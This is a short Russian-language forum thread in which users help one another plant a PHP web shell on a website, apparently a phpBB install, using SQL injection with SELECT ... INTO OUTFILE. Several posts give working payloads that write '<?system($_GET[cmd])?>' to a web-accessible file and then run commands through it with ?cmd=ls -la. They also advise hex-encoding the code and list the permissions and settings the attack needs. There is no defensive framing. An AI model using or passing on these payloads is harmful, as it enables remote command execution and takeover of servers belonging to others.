Обратил. Дальше что? Должен появиться веб шелл по адресе http://sait.ru/phpBB/index.php ? Пробовал. Его там нет.
Во-первых должны быть права на запись. Во-вторых узнай полный путь до этой директории. //локалхост Code: select "<?system($_GET[cmd])?>" into outfile '/home/localhost/www/shell.php'; Потом обращяешься к шеллу так http://localhost/shell.php?cmd=ls -la
не надо там в кавычки ничего обрамлять переведи этот пшп код в хекс например, ты вообще увеерн что у тебя права есть на запись файлов?
по синтаксису sql необходимым условием является: ~ указание существующей таблицы ~ абсолютный путь к файлу ~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса .. и тот кто реально хоть раз грузил так шелл, должен был это знать... PHP: select '<?system($_GET[cmd])?>' from table_name_blaaaahh into outfile '/путь/к/шеллу.php'
Elekt, забыл код обрамить в кавычки Я имел ввиду что надо делать так $_GET[cmd], а не так $_GET['cmd'] А вот про указание существующей таблицы - глупость Я у себя на локалке с успехом выполнял запрос select 1 into outfile '/tmp/123.txt'
